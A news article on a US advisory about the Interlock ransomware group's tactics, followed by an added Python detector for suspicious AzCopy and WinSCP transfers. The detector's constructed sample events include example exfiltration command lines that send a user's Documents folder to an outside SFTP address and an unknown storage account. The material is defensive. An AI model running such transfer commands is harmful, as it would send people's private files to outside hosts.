
US Warns of Widespread Interlock Cyberattacks

Summary

– The US government has warned businesses and critical infrastructure to be vigilant against attacks by the Interlock ransomware gang, which uses novel initial access techniques.
– Interlock employs “drive-by-download” and ClickFix social engineering tactics to infiltrate systems, targeting organizations in North America and Europe.
– The group uses double extortion, exfiltrating and encrypting data to pressure victims into paying ransoms, and deploys ransomware for both Windows and Linux systems.
– Post-compromise, Interlock affiliates use tools like PowerShell scripts, credential stealers, and RDP for lateral movement, exfiltrating data via legitimate tools like AzCopy.
– The advisory recommends defensive measures against Interlock’s tactics, noting the group threatens to leak stolen data unless ransoms are paid in Bitcoin.

The US government has issued an urgent warning about escalating cyber threats from the Interlock ransomware group, urging businesses and critical infrastructure operators to strengthen their defenses. Federal agencies including the FBI and Department of Health and Human Services revealed the group’s sophisticated tactics, which have already compromised healthcare systems and local governments across North America and Europe.

Interlock’s operations stand out due to their unconventional infiltration methods, particularly a drive-by-download technique that automatically infects devices when users visit compromised websites. Unlike typical ransomware groups, they also employ ClickFix social engineering, tricking victims into executing malicious scripts disguised as error messages. Once inside a network, attackers deploy credential stealers, keyloggers, and remote desktop tools to move laterally before encrypting files and demanding payment.

Double extortion remains their signature strategy, stealing sensitive data before locking systems, then threatening to leak information unless ransoms are paid in Bitcoin. Recent high-profile victims include Kettering Health in Ohio and West Lothian Council in Scotland, demonstrating the group’s ability to disrupt essential services.

To counter these threats, authorities recommend immediate defensive measures:

  • Disabling unnecessary scripting (like PowerShell) where possible
  • Enforcing multi-factor authentication to block credential theft
  • Segmenting networks to limit lateral movement
  • Monitoring for unusual file transfers, especially via tools like AzCopy or WinSCP
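The last recommendation in practice, as an added example that is not part of the advisory or the article: a small Python detector that reviews constructed process-creation events and flags AzCopy or WinSCP launches whose user, transfer destination or binary location falls outside an assumed allowlist (the sample events, hostnames, allowlists and the 203.0.113.40 address are all constructed for illustration).

```python
"""Flag AzCopy / WinSCP launches that look like bulk data exfiltration (added example)."""
import re

# Constructed process-creation events, simplified from a Sysmon-style log (not real data).
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\svc-backup", "image": "C:\\Tools\\azcopy.exe",
     "cmdline": 'azcopy.exe copy "D:\\Shares\\Finance" "https://corpbackup.blob.core.windows.net/daily?sv=TOKEN" --recursive'},
    {"host": "WS-114", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\azcopy.exe",
     "cmdline": 'azcopy.exe copy "C:\\Users\\jdoe\\Documents" "https://xz9k2example.blob.core.windows.net/in?sv=TOKEN" --recursive'},
    {"host": "WS-114", "user": "CORP\\jdoe", "image": "C:\\Program Files\\WinSCP\\WinSCP.exe",
     "cmdline": 'WinSCP.exe /command "open sftp://user@203.0.113.40/" "put C:\\Users\\jdoe\\Documents\\*"'},
    {"host": "WS-200", "user": "CORP\\asmith", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

TRANSFER_TOOLS = {"azcopy.exe", "winscp.exe"}
# Assumed allowlist: the one sanctioned destination and the account expected to use it.
APPROVED_DESTINATIONS = {"corpbackup.blob.core.windows.net"}
APPROVED_USERS = {"CORP\\svc-backup"}
# Host part of http(s)/sftp/ftp/scp URLs in the command line, skipping any user@ prefix.
DEST_RE = re.compile(r'(?:https?|sftp|ftp|scp)://(?:[^/\s@"]+@)?([^/\s"?:]+)', re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.I)


def review_event(ev):
    """Return None for non-transfer tools, else the reasons to flag (empty list = benign)."""
    exe = ev["image"].rsplit("\\", 1)[-1].lower()
    if exe not in TRANSFER_TOOLS:
        return None
    reasons = []
    if ev["user"] not in APPROVED_USERS:
        reasons.append(f"user {ev['user']} is not approved for bulk transfers")
    for dest in DEST_RE.findall(ev["cmdline"]):
        if dest.lower() not in APPROVED_DESTINATIONS:
            reasons.append(f"unapproved destination {dest}")
    if USER_WRITABLE_RE.search(ev["image"]):
        reasons.append("tool launched from a user-writable directory")
    return reasons


def find_suspicious_transfers(events):
    """Collect flagged events (tool name plus reasons) for an alert or analyst review queue."""
    findings = []
    for ev in events:
        reasons = review_event(ev)
        if reasons:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "tool": ev["image"].rsplit("\\", 1)[-1], "reasons": reasons})
    return findings
```

Running find_suspicious_transfers(SAMPLE_EVENTS) flags the two WS-114 launches (AzCopy from a Temp directory to an unknown storage account, and WinSCP pushing a user's Documents to an outside SFTP host) and leaves the sanctioned backup job alone.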

Interlock’s ransom notes omit payment details initially, instead directing victims to a Tor-based portal where negotiations occur. The group has followed through on threats to publish stolen data, making proactive security upgrades critical. With attacks growing bolder, organizations must prioritize real-time threat detection and employee training to recognize social engineering ploys.

Federal agencies emphasize that paying ransoms does not guarantee data recovery and may fuel further attacks. Instead, businesses should maintain offline backups, patch vulnerabilities promptly, and report incidents to law enforcement to disrupt the ransomware ecosystem. As cybercriminals refine their tactics, a layered defense strategy remains the most effective safeguard against escalating threats.

(Source: InfoSecurity Magazine)
